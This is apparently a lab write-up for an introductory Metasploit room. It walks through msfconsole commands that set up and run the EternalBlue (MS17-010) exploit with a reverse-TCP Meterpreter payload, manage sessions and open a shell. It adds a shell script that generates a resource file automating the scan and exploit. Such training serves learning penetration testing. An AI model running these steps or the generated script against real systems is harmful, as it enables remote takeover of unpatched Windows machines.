Metasploit: Introduction
Summary
As we have seen, Metasploit is a powerful exploitation framework. The exploitation
process consists of three major steps: identifying a suitable exploit, customising
it for the target, and running it against the vulnerable service.
Task 2: Main Components of Metasploit
Auxiliary modules can be found in:
/usr/share/metasploit-framework/modules/auxiliary/
Encoder modules can be found in:
/usr/share/metasploit-framework/modules/encoders/
Evasion modules can be found in:
/usr/share/metasploit-framework/modules/evasion/
Exploit modules can be found in:
/usr/share/metasploit-framework/modules/exploits/
NOP modules can be found in:
/usr/share/metasploit-framework/modules/nops/
Payloads can be found in:
/usr/share/metasploit-framework/modules/payloads/
Post modules can be found in:
/usr/share/metasploit-framework/modules/post/
Task 3 - Msfconsole
In this task we will set up a module to exploit the MS17-010 (EternalBlue) SMB
vulnerability.
[~] - hak101> msfconsole
msf6 > search MS17_010
The search returns a numbered list of modules whose name or description matches
MS17_010; the one we want is exploit/windows/smb/ms17_010_eternalblue.
We can select the EternalBlue exploit by its index in the search results (0 here).
Index numbers depend on the search output, so typing the full module path,
use exploit/windows/smb/ms17_010_eternalblue, works regardless of the ordering.
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
The prompt now shows the module context, and a default payload has been chosen for us.
Now we can use the show options command to check all the options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Now we need to set RHOSTS and RPORT to the victim machine's IP and the SMB port we
are attacking (445 by default), and LHOST and LPORT to our own IP and the port we
want to listen on for the reverse connection. LHOST must be an address the target
can reach, so on a VPN that is the VPN interface address, not the LAN one.
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads
This command lists the payloads compatible with the exploit so we can choose one
with set payload.
If you want more info about the module use the info command
msf6 exploit(windows/smb/ms17_010_eternalblue) > info
Task 4 - Working with modules
In this task we will look at the different prompts we meet and what each one tells
us about where we are.
A normal terminal command prompt:
root@ip-10-10-XX-XX:~#
A msfconsole prompt:
msf6 >
A context prompt:
msf6 exploit(windows/smb/ms17_010_eternalblue) >
A shell on the target system:
C:\Windows\system32>
The Meterpreter prompt:
meterpreter >
Our goal now is to get a Meterpreter session using the EternalBlue exploit and
explore the options.
We can set RHOSTS to the target IP
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.67.185
RHOSTS => 10.10.67.185
Using the show options command we can check which required options are still unset.
Now we set our LHOST and LPORT to our IP and listening port:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.23.98.129
LHOST => 10.23.98.129
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444
Using the run command we can execute the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
If the exploit succeeds we get a Meterpreter session.
A few things are worth learning here, starting with backgrounding the session so
we can keep using msfconsole while the session stays open:
meterpreter > background
To list all open sessions (each one has a numeric ID):
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions
To connect back to a session, pass its ID to sessions -i:
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
To drop into a shell
meterpreter > shell
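The steps of Tasks 3 and 4 (identify, configure, check, exploit, background the session) can be captured in a Metasploit resource script so they are replayed identically on each run with msfconsole -r. The script below is an added example written for this writeup, not part of the room or of Metasploit itself; the file name, the function names and the way the addresses are passed on the command line are assumptions. It validates RHOSTS, LHOST and LPORT before anything is written, because a typo in those options otherwise only surfaces after msfconsole has started.

```shell
#!/bin/sh
# build_ms17_rc.sh (assumed name): generate a Metasploit resource script that
# replays the workflow from Tasks 3 and 4: confirm the host is vulnerable with
# the MS17-010 scanner, configure the EternalBlue exploit, run 'check', then
# exploit with -z so the new session stays backgrounded for 'sessions -i'.
# The function names and command-line interface here are made up for this example.

# validate_ipv4 ADDR: succeed only if ADDR is four dotted decimal octets, each 0-255.
validate_ipv4() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS
    IFS=.
    set -- $1            # split on dots into the function's positional parameters
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# build_rc RHOSTS LHOST [LPORT]: print the resource script to stdout.
# LPORT defaults to 4444, the port used in the room. Fails (exit 1) on bad input.
build_rc() {
    rhosts=$1
    lhost=$2
    lport=${3:-4444}
    validate_ipv4 "$rhosts" || { echo "build_rc: bad RHOSTS '$rhosts'" >&2; return 1; }
    validate_ipv4 "$lhost"  || { echo "build_rc: bad LHOST '$lhost'" >&2; return 1; }
    case $lport in
        ''|*[!0-9]*) echo "build_rc: bad LPORT '$lport'" >&2; return 1 ;;
    esac
    [ "$lport" -ge 1 ] && [ "$lport" -le 65535 ] || {
        echo "build_rc: LPORT '$lport' out of range" >&2; return 1; }
    cat <<EOF
# Step 1: identify - confirm the host is vulnerable before firing the exploit.
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $rhosts
run

# Step 2: customise - select the exploit and set target and listener options.
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $rhosts
set LHOST $lhost
set LPORT $lport
set payload windows/x64/meterpreter/reverse_tcp
show options

# Step 3: exploit - 'check' first, then run with -z so the session is left
# backgrounded; list it with 'sessions -l' and attach with 'sessions -i <id>'.
check
exploit -z
sessions -l
EOF
}

# Usage: sh build_ms17_rc.sh 10.10.67.185 10.23.98.129 > eternalblue.rc
#        msfconsole -q -r eternalblue.rc
if [ $# -ge 2 ]; then
    build_rc "$@"
fi
```

The generated file is plain msfconsole input, one command per line with # comments allowed, so it can be reviewed (and diffed between engagements) before it is ever run against a target.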
Conclusion
Metasploit includes numerous modules that can be used for each stage of the
exploitation process. This room has shown us the fundamental components of
Metasploit and how they are used.